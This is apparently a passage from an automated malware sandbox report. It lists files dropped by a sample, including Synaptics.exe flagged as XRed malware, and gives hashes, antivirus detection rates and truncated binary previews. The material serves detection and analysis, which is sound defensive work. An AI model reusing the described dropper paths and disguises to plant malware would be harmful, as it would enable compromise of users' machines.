                                                                                            SHA-512:133442C4A65269F817675ADF01ADCF622E509AA7EC7583BCA8CD9A7EB6018D2AAB56066054F75657038EFB947CD3B3E5DC4FE7F0863C8B3B1770A8FA4FE2E658
                                                                                            Malicious:false
                                                                                            Preview:BM........6...(...1...1...........V.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\sqmapi.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):144416
                                                                                            Entropy (8bit):6.7404750879679485
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:uochw/MFWrJjKOMxRSepuBaqn/NlnBh2Lx0JVzx1wWobn1ek8F7HncO5hK9YSHlN:zDFB47UhXBh2yJ5HcOSSSHZqG
                                                                                            MD5:3F0363B40376047EFF6A9B97D633B750
                                                                                            SHA1:4EAF6650ECA5CE931EE771181B04263C536A948B
                                                                                            SHA-256:BD6395A58F55A8B1F4063E813CE7438F695B9B086BB965D8AC44E7A97D35A93C
                                                                                            SHA-512:537BE86E2F171E0B2B9F462AC7F62C4342BEB5D00B68451228F28677D26A525014758672466AD15ED1FD073BE38142DAE478DF67718908EAE9E6266359E1F9E8
                                                                                            Malicious:false
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................................Rich...................PE..L....IE...........!.........$.....................l.........................@......R.....@.........................D.......$...d....................... (... ......P...8............................\..@.......t.......D............................text............................... ..`.data...............................@....rsrc...............................@..@.reloc....... ......................@..Ba.IE8....IEC....IEP....IEZ.....IEe....IEP...........msvcrt.dll.ADVAPI32.dll.ntdll.DLL.USER32.dll.KERNEL32.dll...............................................................................................................................................................................................................................................

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\vc_red.cab

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Microsoft Cabinet archive data, 4823925 bytes, 19 files, at 0x44 +A "F_CENTRAL_atl100_x64" +A "F_CENTRAL_mfc100_x64", flags 0x4, number 1, extra bytes 20 in head, 439 datablocks, 0x1503 compression
                                                                                            Category:dropped
                                                                                            Size (bytes):4829869
                                                                                            Entropy (8bit):7.999861791193514
                                                                                            Encrypted:true
                                                                                            SSDEEP:98304:ULaxrwQE3xM5HwcIqZZSPlG9Z27TinTCc/1oQv/ZhU8:UL0rwQEhyHwcIUYSoi+ctf/LU8
                                                                                            MD5:96253C1D1B54044A8640E9932DFCA0B9
                                                                                            SHA1:CC7E1D06D63D4A2C6502AD450E3C3B3458EE0A44
                                                                                            SHA-256:50EEC49FAD75C67968F75E53BA21AEDF22BB11271F5CE8DE37AA48955697C6CE
                                                                                            SHA-512:82D75BA90E44D74DC94C7D246D5B6594F2F773E9748F235585F05A065F476A4CB690DD2B78BEB5EF8B661F9FE826585B5CCA2B3AA80E7506B8CD2B76D5AD770E
                                                                                            Malicious:false
                                                                                            Preview:MSCF....u.I.....D...........................u.I.8...........[.......Hk........r<.L .F_CENTRAL_atl100_x64.H.S.Hk....r<.L .F_CENTRAL_mfc100_x64.P....>V...r<.L .F_CENTRAL_mfc100chs_x64.P.....V...r<.L .F_CENTRAL_mfc100cht_x64.P...0YW...r<.L .F_CENTRAL_mfc100deu_x64.P....TX...r<.L .F_CENTRAL_mfc100enu_x64.P....+Y...r<.L .F_CENTRAL_mfc100esn_x64.P... %Z...r<.L .F_CENTRAL_mfc100fra_x64.P...p [...r<.L .F_CENTRAL_mfc100ita_x64.P.....\...r<.L .F_CENTRAL_mfc100jpn_x64.P.....\...r<.L .F_CENTRAL_mfc100kor_x64.P...`h]...r<.L .F_CENTRAL_mfc100rus_x64.PET..U^...r<.L .F_CENTRAL_mfc100u_x64.Pe........r<.L .F_CENTRAL_mfcm100_x64.Pe..P.....r<.L .F_CENTRAL_mfcm100u_x64.PE...e....r<.L .F_CENTRAL_msvcp100_x64.P.......r<.L .F_CENTRAL_msvcr100_x64.P...@L....r<.L .F_CENTRAL_vcomp100_x64.P....+....s<.6 .FL_msdia71_dll_2_60035_amd64_ln.3643236F_FC70_11D3_A536_0090278A1BB8.@.].J=..[........."..$..N...Z..{..........r.=.C.......@@....Tx...6.....;.a*..a....g.|.....Y.y....P.........}...m..9{.9...i...ygw[...B.M6

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\vc_red.msi

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.0, MSI Installer, Code page: 1252, Title: Installation Database, Subject: Visual C++ 2010 x64 Redistributable, Author: Microsoft Corporation, Keywords: Installer, Comments: This installer database contains the logic and data required to install Microsoft Visual C++ 2010 x64 Redistributable - 10.0.30319., Template: x64;0, Revision Number: {4DB491B7-9632-4543-AC91-D4B80F6DBE17}, Create Time/Date: Fri Mar 19 15:50:42 2010, Last Saved Time/Date: Fri Mar 19 15:50:42 2010, Number of Pages: 200, Name of Creating Application: Windows Installer XML (3.5.0626.0), Security: 2, Number of Words: 2
                                                                                            Category:dropped
                                                                                            Size (bytes):168960
                                                                                            Entropy (8bit):6.262629898297588
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:POTbkSoT5jvtXSH/+rzTPe9oPxM5DNmHWVcqelSxbfS695:mTwSoT5jdSGP2f5hB
                                                                                            MD5:93BB8E3E96A206B39175345111D452E2
                                                                                            SHA1:3D4D02D0240E2651E14947772498C1AF73EDFBC8
                                                                                            SHA-256:392710654BDC1DAAD76240584ED3C375D7C42821D8CB8B38867F9A13DB72392B
                                                                                            SHA-512:B7C77F793379A1E55818E66D7C205508E25AB08D93029D29FA7E6886D6C0942BB914479D6BD4039CC48CC2F34A55E6D6888266166E540F919F5218DC4AF9F302
                                                                                            Malicious:false
                                                                                            Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                            C:\36a8a8e2fed651ec27d1eed188bb35\watermark.bmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\._cache_file.exe
                                                                                            File Type:PC bitmap, Windows 3.x format, 164 x 628 x 24, image size 308978, resolution 2834 x 2834 px/m, cbSize 309032, bits offset 54
                                                                                            Category:dropped
                                                                                            Size (bytes):309032
                                                                                            Entropy (8bit):6.583379857106919
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:yUDLmozgtuVYKKKvwUbKh5+/uWLspp2e1jSaMsb1bIZU0g0WQbO//QGVYBtGKQgc:yUDLmozvygKjzbIGgBZBkUfDfc
                                                                                            MD5:1A5CAAFACFC8C7766E404D019249CF67
                                                                                            SHA1:35D4878DB63059A0F25899F4BE00B41F430389BF
                                                                                            SHA-256:2E87D5742413254DB10F7BD0762B6CDB98FF9C46CA9ACDDFD9B1C2E5418638F2
                                                                                            SHA-512:202C13DED002D234117F08B18CA80D603246E6A166E18BA422E30D394ADA7E47153DD3CCE9728AFFE97128FDD797FE6302C74DC6882317E2BA254C8A6DB80F46
                                                                                            Malicious:false
                                                                                            Preview:BM(.......6...(.......t.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                            Download File
                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):118
                                                                                            Entropy (8bit):3.5700810731231707
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                            MD5:573220372DA4ED487441611079B623CD
                                                                                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Synaptics.exe_ace1313b643a5d083434cea8e6428dfa37df048_455b7b6e_39cf2af4-b331-442c-a8a9-dcfabfc5bc2a\Report.wer

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):65536
                                                                                            Entropy (8bit):1.1333234482831043
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:wbZfVpsKuImE0jM3ODzJDzqjLOA/FcdsJzuiF4fZ24IO8EKDzy:sDy9FjM3OJqjkCzuiF4fY4IO8zy
                                                                                            MD5:F011288B63207603C2F3F33D7E149CC6
                                                                                            SHA1:9BC6879E4BA8BD3936015FD3B5247795547CD82E
                                                                                            SHA-256:184FB7C64FAE6155596D469E17CEC7D58E047EECDEF95E374ACFE325DF513618
                                                                                            SHA-512:0311395D3E0769213B8C1999B764E987E14969DA4A6881786F9E05D68E4ACC6E789B75E81A05973F70EAA797C5D9CBFC1519B253694012E657523286D62B0DE0
                                                                                            Malicious:false
                                                                                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.0.3.1.9.8.1.6.0.1.4.0.8.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.0.3.1.9.8.2.5.7.6.4.1.0.0.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.9.c.f.2.a.f.4.-.b.3.3.1.-.4.4.2.c.-.a.8.a.9.-.d.c.f.a.b.f.c.5.b.c.2.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.b.0.7.e.2.9.-.3.f.e.2.-.4.6.a.b.-.8.f.7.3.-.b.4.e.f.b.0.e.9.f.f.0.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.y.n.a.p.t.i.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.2.0.-.0.0.0.1.-.0.0.1.4.-.4.d.9.d.-.0.c.a.4.4.c.5.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.9.9.a.1.3.7.d.5.9.3.d.d.a.9.d.1.5.8.d.c.8.b.6.b.7.7.2.0.d.e.b.0.0.0.0.1.f.0.4.!.0.0.0.0.b.4.8.6.0.3.f.6.a.1.d.f.f.a.b.2.f.f.4.5.8.7.8.0.0.2.5.f.6.a.3.c.2.e.5.2.3.c.3.c.!.S.y.n.a.p.t.i.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERBE93.tmp.dmp

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Jan 2 19:30:18 2025, 0x1205a4 type
                                                                                            Category:dropped
                                                                                            Size (bytes):4397728
                                                                                            Entropy (8bit):2.112151211997434
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:Rjkp0smAHcy7eMZBC+X3BQGjYD0D377jA:Rkp60tBCGxBjq03A
                                                                                            MD5:47151B610E6F89ADB45B36CF02DB03DB
                                                                                            SHA1:A019871C4A5D51973740D789B175911DC9FE66B4
                                                                                            SHA-256:A60DD86CE69AAD0D268DE87930CDD1A24233B8C4F34C5305C2CD008A653FEE32
                                                                                            SHA-512:211CD8126C01F9CB1B31E849B816113EFE6ABB50A78EB47DFFC83C1727B11A734ED8CABD0EB4356F0FBBC40593D51859271DA545680E63FFA2FB6CD88331C718
                                                                                            Malicious:false
                                                                                            Preview:MDMP..a..... .......J.vg............tG...............N......$...0n......D..............`.......8...........T.................A.........Tn..........@p..............................................................................eJ.......p......GenuineIntel............T....... .....vg.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE362.tmp.WERInternalMetadata.xml

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):6304
                                                                                            Entropy (8bit):3.717267783398188
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:R6l7wVeJCxO69uUqYiSqSgpD089borsfc4m:R6lXJr6WYSpowfS
                                                                                            MD5:DF92C9DE6A56DC17D45D1976BDA8E2DA
                                                                                            SHA1:497D7FE74755030F7B151BA2E2CE2C7148FD21B2
                                                                                            SHA-256:1999BA8B265A446808BB523D4EB39E83693C8A9946F2C2532C3B810C7D7110C3
                                                                                            SHA-512:E5F9C282A899AD0C7CA3398203C228614544AE0975EFABD311190B4405D9463C47D3982353A05ECF1CD026E307B1121D4470EB902677CAE8AE541DCCE9C37F0E
                                                                                            Malicious:false
                                                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.7.1.2.<./.P.i.

                                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WERE392.tmp.xml

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):4572
                                                                                            Entropy (8bit):4.4452273796332165
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:cvIwWl8zs+Jg77aI9ADWpW8VY3AYm8M4JFWFy+q84s5OuZid:uIjf0I76y7VQJzwOuZid
                                                                                            MD5:23AAFD0C7B65A384C4C34EEF933BCE6C
                                                                                            SHA1:F840873AF00437994615BA9DAB0C75CDCA0405EC
                                                                                            SHA-256:93739F6F675B0D64EA4E276028ED19C266696FF836707466CF1BFEEA1DF01435
                                                                                            SHA-512:4B2F918AA1A44CB71C4E0E6054E61ABF8DD2EEADE64814515AD79C6789C3248FCE7D333BEFC7562D076CFE6A1E844ECBAA89596286B9706D24E865518ABB6081
                                                                                            Malicious:false
                                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="658713" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                            C:\ProgramData\Synaptics\RCX3CE.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:modified
                                                                                            Size (bytes):771584
                                                                                            Entropy (8bit):6.6264053582391735
                                                                                            Encrypted:false
                                                                                            SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9IIr:ansJ39LyjbJkQFMhmC+6GD9j
                                                                                            MD5:7407C51DD7AC30C4D79658D991A8B5D6
                                                                                            SHA1:B48603F6A1DFFAB2FF458780025F6A3C2E523C3C
                                                                                            SHA-256:1316730BBC50851C02F53254F9C57B99AF50A07BB0776332D1480BABD626F39A
                                                                                            SHA-512:38334452808E5D203B287E2F4A47B8F5BBCE1ED18FABCFA4A61B8C04429150DFBFFE2241323B3C87D90ABBABBED49A5CEA584CC1CE83BF519BB728E1D6AC18EB
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX3CE.tmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX3CE.tmp, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 94%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                            C:\ProgramData\Synaptics\Synaptics.exe

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):6490624
                                                                                            Entropy (8bit):7.9488402694147355
                                                                                            Encrypted:false
                                                                                            SSDEEP:196608:jLb7wqheSVYK/bua/BlWWnuVhsus8nm+q42:j/8qgSmIbr/Asb8nmFD
                                                                                            MD5:E819C37952E89FF0F473FA9B59CD771D
                                                                                            SHA1:DE2A344ED3A2B1F4E0FBD4E684170DB56903763E
                                                                                            SHA-256:05F954E37982086A48A222726B8134FBEF0CAA78DBE1B66A3D4479B712D12012
                                                                                            SHA-512:1E3EFF7391308A5161B75AB47EF29178A53CE08693C63FD08F5F1443CEEED87C3B4D3779265D669A91AF0192EB556913BCBF77B825678580E44FCEEB3C76D148
                                                                                            Malicious:true
                                                                                            Yara Hits:
                                                                                            • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                            Antivirus:
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................jY...................@..........................pc..................@..............................B*.......`X..................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc....`X......bX.................@..P....................................@..P........................................................................................................................................

                                                                                            C:\ProgramData\Synaptics\Synaptics.exe:Zone.Identifier

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):26
                                                                                            Entropy (8bit):3.95006375643621
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                            Malicious:true
                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                            C:\Users\user\AppData\Local\Temp\2YpZVzV.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.239501008666114
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0QSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+f+pAZewRDK4mW
                                                                                            MD5:2BF5FA639EB2786222A45637DDD7836C
                                                                                            SHA1:21E0D9A0A11D75B177552E97F7F5DC28BD5DC0D3
                                                                                            SHA-256:CBC927B069555FFD076C05CAD4798F562AF8C03D6DA91438AAA4DBB5CDDE6AF1
                                                                                            SHA-512:D75C6741C66A8D3BFA6A3F79EDE5228EC58B3DF460E18E5E0AB88A213DE709B44A470FC29A6E66DD36870527D2FAC41E6897880467BD7ADED185F9B1E0959371
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0tS8m7r2Udpl0dKt5niGzg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\4efvLzx.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.253059363712217
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+0jzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Yz+pAZewRDK4mW
                                                                                            MD5:11821AF6D5B0B0B42E028050DD535635
                                                                                            SHA1:E9B37724A69EBAE1FB1E507A050E102CAA37E0C9
                                                                                            SHA-256:690084F4D650F5B9A835CD1D853A44FC46AB8DC5A3B4B2DC5A557019AED48504
                                                                                            SHA-512:B517ED1E23135325939E1B276F5B32987D0567C36B4B41B436FEB9FD0A8AA6C0287544CDD5A0278629F65D106C108F0AA1CC8E89AB93105C96D237DB2978301E
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="szsQNL5FyuSxWsP-wibTeg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\5G7cgsB.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.265101220616923
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+r+pAZewRDK4mW
                                                                                            MD5:DF7C13394DE09DB939902B071ECF52DE
                                                                                            SHA1:C1875D4DF7A0FAB3AFD48F0A988ADE1569CBE399
                                                                                            SHA-256:5EE978ED29D1B88F3DC1809E1B4F4503EB637A45759E1E51F7B11645F6F855B5
                                                                                            SHA-512:730E14138C5DCB80740A6AB90FC9DBB3C2A47078F297BA211A5B79A18B30297D05E6CFC6BE2EAD5A52EA894C6A35EAF22FA5C3D9D7BAC41E7426E754D582199B
                                                                                            Malicious:false
                                                                                            Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ioHYXWkrMwnMe9mqkKPjpQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

                                                                                            C:\Users\user\AppData\Local\Temp\5GoPcQv.ini

                                                                                            Download File
                                                                                            Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):1652
                                                                                            Entropy (8bit):5.2623432607256735
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:GgsF+08qHqISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0HqI+pAZewRDK4mW
                                                                                            MD5:5FE73AB1C17762AF662EA7C741AD366D
